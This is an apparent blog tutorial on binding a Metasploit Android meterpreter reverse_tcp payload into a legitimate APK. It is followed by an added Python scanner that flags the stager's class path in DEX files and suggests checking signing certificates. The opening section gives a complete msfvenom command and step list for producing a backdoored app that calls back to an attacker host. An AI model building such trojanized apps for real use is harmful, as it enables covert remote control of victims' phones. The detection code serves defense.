Hiding a Payload in Original Apk using Metasploit Command

Today I finally embedded the payload APK into an original APK file. There is a simple way to bind the payload into the original APK: the command is easy to type, but the work it does behind the scenes is very complex. Hats off to H.D. Moore.

In this tutorial I'm going to explain how to embed the payload into an original APK file, and I'm also going to explain how the command works.


Command :

msfvenom -x 'Original apk file' -p android/meterpreter/reverse_tcp LHOST=(ipaddress) LPORT=4444 -o 'backdoor-apk filename'

Working:

Step 1 : First of all it decompiles the original APK file.

Step 2 : In that extracted folder it creates the payload .smali files under com/metasploit/stage/...

Step 3 : It locates the AndroidManifest.xml file and modifies it, adding the entries needed to execute the payload .smali classes.

Step 4 : After that it adds the permissions the payload needs to the APK.

Step 5 : Finally it signs the output APK file.


This is how the payload gets hidden inside an Android application.
The final output is called a backdoored application.
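The steps above leave a recognisable trace in the output: once the com/metasploit/stage/ smali from step 2 is assembled, the class descriptors end up as strings in classes.dex, and step 5 re-signs the APK with a key that is not the original publisher's. The following is an added example (not part of the original post or of Metasploit) that checks an APK for the first of these indicators. It assumes only that an APK is a ZIP archive and that the stager's class path survives in the DEX string table; the sample APK it builds is constructed fake data, and the class name Payload in it is a made-up sample string.

```python
"""Heuristic scan for an msfvenom-style Android stager.

Added example, not the original post's code. Assumptions (not from the post):
an APK is a ZIP file, and compiled stager classes leave the descriptor string
"com/metasploit/stage" inside classes.dex / classesN.dex. A hit is an
indicator worth triaging, not proof on its own.
"""
import io
import zipfile

# Class-path fragment named in step 2; survives assembly into DEX as a string.
STAGE_MARKER = b"com/metasploit/stage"


def scan_apk_bytes(apk_bytes: bytes) -> dict:
    """Return a report: DEX entries seen, which of them contain the stage
    marker, and whether the archive carries a v1 signature block in META-INF/
    (step 5 always produces one, so 'signed' alone proves nothing)."""
    report = {"dex_entries": [], "marker_hits": [], "signed": False}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.startswith("META-INF/") and name.upper().endswith(
                (".RSA", ".DSA", ".EC")
            ):
                report["signed"] = True
            if name.endswith(".dex"):
                report["dex_entries"].append(name)
                if STAGE_MARKER in zf.read(name):
                    report["marker_hits"].append(name)
    return report


def is_backdoored(apk_bytes: bytes) -> bool:
    """True when any DEX entry carries the stage marker."""
    return bool(scan_apk_bytes(apk_bytes)["marker_hits"])


def build_sample_apk(with_stager: bool) -> bytes:
    """Construct a minimal fake APK (sample data, not a real app) so the
    scanner can be exercised offline. The DEX content is a placeholder header
    followed by class descriptor strings, which is all the scanner needs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # Real APKs carry a binary XML manifest; a placeholder is enough here.
        zf.writestr("AndroidManifest.xml", b"<manifest placeholder/>")
        dex = bytearray(b"dex\n035\x00" + b"\x00" * 64)
        dex += b"Lcom/example/app/MainActivity;\x00"
        if with_stager:
            # Constructed sample descriptor in the stage package from step 2.
            dex += b"Lcom/metasploit/stage/Payload;\x00"
        zf.writestr("classes.dex", bytes(dex))
        # Placeholder signature block standing in for the re-signing in step 5.
        zf.writestr("META-INF/CERT.RSA", b"\x30\x82placeholder-signature")
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        r = scan_apk_bytes(build_sample_apk(flag))
        print(f"stager={flag}: hits={r['marker_hits']} signed={r['signed']}")
```

To run it against a real file, pass `open(path, "rb").read()` to `scan_apk_bytes`. The string marker is a weak signal because the package path is trivially renamed; the more durable check is the one step 5 implies: compare the signing certificate of a suspicious APK with the publisher's known certificate, since re-signing with a different key is unavoidable when the original is modified.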

